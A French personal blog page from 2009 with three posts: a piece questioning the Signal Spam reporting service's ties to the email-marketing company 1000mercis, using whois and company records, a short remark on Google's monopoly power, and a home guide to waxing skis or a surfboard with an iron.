Wednesday, February 4th, 2009Il y a quelques années, la Cnil avait mis en place un service Internet pour lutter contre le spam, mais il avait du rapidement fermer, car complètement saturé. Les autorités n’ont pas baissé les bras pour autant. Fruit du travail de la Direction du développement des média (service du Premier Ministre), Signal Spam doit servir à arrêter ce véritable fléau qu’est le pourriel. Cette fois, les soutiens sont nombreux : le CERTA (Centre d’Expertise Gouvernemental de Réponse et de Traitement des Attaques informatiques), la CNIL, le FDI (Forum des droits sur l’Internet), la Gendarmerie nationale, La Poste, Microsoft, le ministère de l’Industrie et de la Justicve, l’OCLCTIC (Office Central de Lutte contre la Criminalité liée aux Technologies de l’Information et de la Communication ), l’APRIL (Association pour la Promotion et la Recherche en Informatique Libre), la Banque de France, la Répression des fraudes (DGCCRF). Rien que ça !
Les médias ont été heureux d’annoncer la nouvelle à leurs lecteurs. Mais ils se sont contentés de reprendre la communication officielle sans faire la moindre enquête. Des participants de la liste de discussion Spam-RBL chez OVH se sont montrés plus curieux. Voici ce qu’ils ont découvert.
Un whois sur le nom de domaine donne un résultat des plus sérieux :
| domain: signal-spam.fr address: DIR DES SERVICES ADMINIST ET FINANCIERS address: 13, rue Vaneau address: 75007 Paris address: FR phone: +33 1 42 75 57 98 e-mail: admin-c: JG1560-FRNIC tech-c: IN484-FRNIC zone-c: NFC1-FRNIC nserver: ns1.integra-europe.fr 217.115.161.161 nserver: ns2.integra-europe.fr 217.115.161.162 mnt-by: FR-NIC-MNT mnt-lower: FR-NIC-MNT changed: 20050817 source: FRNIC person: Jerome Gueydan role: INTEGRA NET |
A la page de présentation de Signal Spam, on apprend que l’« association est présidée par Monsieur Dominique Roux, Professeur à l’Université Paris IX Dauphine ». Sur la page des status que le « siège de l’association est fixé chez 1000 Mercis, 28 rue de Châteaudun – 75009 Paris ». En regardant dans les mentions légales, on constate que le directeur de la publication est Dominique Roux, le président (logique !).
En regardant le site de 1000mercis, on apprend que le p.-d.g. de la société, Yseulys Costes, a été élue au bureau de Signal Spam** en tant que Conseil Permanent. Les deux étoiles renvoient à ce texte :
| Présidée par M. Dominique Roux, cette association témoigne d’un engagement partagé des pouvoirs publics et de la société civile dans la lutte contre le Spam en France. Elle s’inscrit dans la continuité de l’initiative lancée par la CNIL en 2002. Cette association regroupe l’ACSEL, l’AFA, l’AFOM, l’APRIL, BSA, la FEVAD, le GESTE, l’UDA, le SNCD, Microsoft et la Poste. La Direction du développement des Médias, la Commission nationale de l’informatique et des libertés (CNIL), le Ministère de l’intérieur, le Ministère de l’industrie et l’Union nationale des associations familiales (UNAF) y sont à titre d’observateurs. |
En se renseignant auprès du registre du commerce, on apprend que Dominique Roux est aussi administrateur de 1000mercis.
Il y a quelques moins, 01net consacrait un article à cette société à l’occasion de la publication de la publication de ses résultats annuels (un chiffre d’affaires de plus de 8 millions d’euros sur l’exercice 2005/2006, en hausse de 95 %, avec un résultat net de 2,6 millions d’euros pour une marge nette de 33,2 %). Mais que fait cette société ? De la publicité interactive et le marketing interactif. Elle utilise notamment Elisa, un couplage de bases de données en provenance de ses propres sites (millemercis.com, millemercismariage.com…) mais aussi de ses nombreux partenaires (La Poste, Meetic, AOL, TF1.fr, AlloCine…). Un gigantesque fichier de huit millions d’individus, dont vous faites probablement déjà partie.
Maintenant vous savez à qui vous signalez le spam et communiquez votre mail…
Master Plan - About the power of Google (ORIGINAL)
Saturday, January 31st, 2009Voici un des risques du monopole
Dans la société capitaliste, le monopole est ce qui fait passer une société d’un mode de fonctionnement libéral à un fonctionnement de type stalinien
Source: atocean@
Comment Bien farter son surf ou ses skis :)
Monday, January 12th, 2009bon période hiver oblige :
matériel requis :
1 fer a repasser (prenez un vieux fer sinon votre mère ou votre femme risque de vous démolir- croyez-en mon expérience)
1 Un établis si possible car plus pratique !!
-brosser la semelle avec la brosse nylon afin de faire ressortir les micro-poils de votre semelle toujours dans le sens de glisse, étape d’environ 2 minutes.
- préparer votre fer sur position coton environ 140°c , attention il faut pas que ça fume !!
Se munir du pain de farte et le laisser fondre sur le fer pour que les gouttes de farte tombe sur la semelle, pas la peine d’en coller trop on va le racler !!! (petite trainée de gouttes de farte tout le long de la semelle si possible)
Repassez vos semelles avec le fer sans trop rester longtemps au même endroit sinon ouille ouille !!
Normalement vous devriez voir la semelle boire le farte.
Laissez refroidir environ 20 minutes, pour les skieurs faire le deuxième ski en attendant !!
Prendre la racle en plastique et enlever le plus possible de farte de la semelle (il faut pas oublier que c’est la semelle qui glisse, pas le farte ) toujours dans le sens de la glisse…
Une fois le maximum gratté, prendre la brosse nylon et polir au maximum la semelle qui doit être brillante, sans traces du farte, ne pas oublier de bien racler les carres.
c est fini !!
bonne glisse
Seb&Wasp